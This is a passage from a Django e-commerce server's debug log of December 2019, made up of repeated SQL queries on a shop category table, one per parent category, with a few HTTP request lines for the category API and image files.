c.relnamespace WHERE c.relkind IN ('f', 'm', 'p', 'r', 'v') AND n.nspname NOT IN ('pg_catalog', 'pg_toast') AND pg_catalog.pg_table_is_visible(c.oid) ; args=None DEBUG 2019-12-27 09:23:28,352 utils 2749 140297364883200 (0.001) SELECT "django_migrations"."app", "django_migrations"."name" FROM "django_migrations"; args=() [27/Dec/2019 09:24:37] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-27 09:28:20,296 utils 2749 140297254205184 (0.004) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-27 09:28:20,312 utils 2749 140297254205184 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-27 09:28:20,319 utils 2749 140297254205184 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) DEBUG 2019-12-27 09:28:20,323 utils 2749 140297254205184 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-27 09:28:20,329 utils 2749 140297254205184 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) DEBUG 2019-12-27 09:28:20,333 utils 2749 140297254205184 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) DEBUG 2019-12-27 09:28:20,337 utils 2749 140297254205184 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2019-12-27 09:28:20,341 utils 2749 140297254205184 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2019-12-27 09:28:20,344 utils 2749 140297254205184 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-27 09:28:20,347 utils 2749 140297254205184 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) DEBUG 2019-12-27 09:28:20,349 utils 2749 140297254205184 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) DEBUG 2019-12-27 09:28:20,351 utils 2749 140297254205184 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) DEBUG 2019-12-27 09:28:20,354 utils 2749 140297254205184 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2019-12-27 09:28:20,356 utils 2749 140297254205184 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-27 09:28:20,359 utils 2749 140297254205184 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) DEBUG 2019-12-27 09:28:20,361 utils 2749 140297254205184 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) DEBUG 2019-12-27 09:28:20,364 utils 2749 140297254205184 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) DEBUG 2019-12-27 09:28:20,366 utils 2749 140297254205184 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2019-12-27 09:28:20,368 utils 2749 140297254205184 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-27 09:28:20,372 utils 2749 140297254205184 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(37,) DEBUG 2019-12-27 09:28:20,374 utils 2749 140297254205184 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) DEBUG 2019-12-27 09:28:20,376 utils 2749 140297254205184 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) DEBUG 2019-12-27 09:28:20,378 utils 2749 140297254205184 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) DEBUG 2019-12-27 09:28:20,381 utils 2749 140297254205184 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(35,) DEBUG 2019-12-27 09:28:20,383 utils 2749 140297254205184 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-27 09:28:20,386 utils 2749 140297254205184 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2019-12-27 09:28:20,388 utils 2749 140297254205184 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(29,) DEBUG 2019-12-27 09:28:20,390 utils 2749 140297254205184 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) DEBUG 2019-12-27 09:28:20,393 utils 2749 140297254205184 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2019-12-27 09:28:20,395 utils 2749 140297254205184 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-27 09:28:20,398 utils 2749 140297254205184 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) DEBUG 2019-12-27 09:28:20,401 utils 2749 140297254205184 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2019-12-27 09:28:20,405 utils 2749 140297254205184 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2019-12-27 09:28:20,408 utils 2749 140297254205184 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) DEBUG 2019-12-27 09:28:20,413 utils 2749 140297254205184 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-27 09:28:20,420 utils 2749 140297254205184 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) DEBUG 2019-12-27 09:28:20,424 utils 2749 140297254205184 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2019-12-27 09:28:20,427 utils 2749 140297254205184 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(32,) DEBUG 2019-12-27 09:28:20,430 utils 2749 140297254205184 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(31,) DEBUG 2019-12-27 09:28:20,433 utils 2749 140297254205184 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 2019-12-27 09:28:20,435 utils 2749 140297254205184 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-27 09:28:20,438 utils 2749 140297254205184 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(17,) DEBUG 2019-12-27 09:28:20,440 utils 2749 140297254205184 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 2019-12-27 09:28:20,443 utils 2749 140297254205184 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2019-12-27 09:28:20,445 utils 2749 140297254205184 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2019-12-27 09:28:20,447 utils 2749 140297254205184 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) [27/Dec/2019 09:28:20] "GET /api/v1/categories/ HTTP/1.0" 200 15396 [27/Dec/2019 09:28:21] "GET /media/categories/2019/12/07/collection6.png HTTP/1.0" 200 600645 [27/Dec/2019 09:28:21] "GET /media/categories/2019/12/07/collection10.png HTTP/1.0" 200 387799 [27/Dec/2019 09:29:39] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-27 09:30:03,382 utils 2749 140297254205184 (0.004) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-27 09:30:03,389 utils 2749 140297254205184 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-27 09:30:03,393 utils 2749 140297254205184 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) DEBUG 2019-12-27 09:30:03,396 utils 2749 140297254205184 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-27 09:30:03,399 utils 2749 140297254205184 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) DEBUG 2019-12-27 09:30:03,401 utils 2749 140297254205184 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) DEBUG 2019-12-27 09:30:03,404 utils 2749 140297254205184 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2019-12-27 09:30:03,406 utils 2749 140297254205184 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2019-12-27 09:30:03,410 utils 2749 140297254205184 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-27 09:30:03,415 utils 2749 140297254205184 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) DEBUG 2019-12-27 09:30:03,417 utils 2749 140297254205184 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) DEBUG 2019-12-27 09:30:03,419 utils 2749 140297254205184 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) DEBUG 2019-12-27 09:30:03,421 utils 2749 140297254205184 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2019-12-27 09:30:03,424 utils 2749 140297254205184 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-27 09:30:03,427 utils 2749 140297254205184 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) DEBUG 2019-12-27 09:30:03,430 utils 2749 140297254205184 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) DEBUG 2019-12-27 09:30:03,433 utils 2749 140297254205184 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) DEBUG 2019-12-27 09:30:03,436 utils 2749 140297254205184 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2019-12-27 09:30:03,440 utils 2749 140297254205184 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-27 09:30:03,445 utils 2749 140297254205184 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(37,) DEBUG 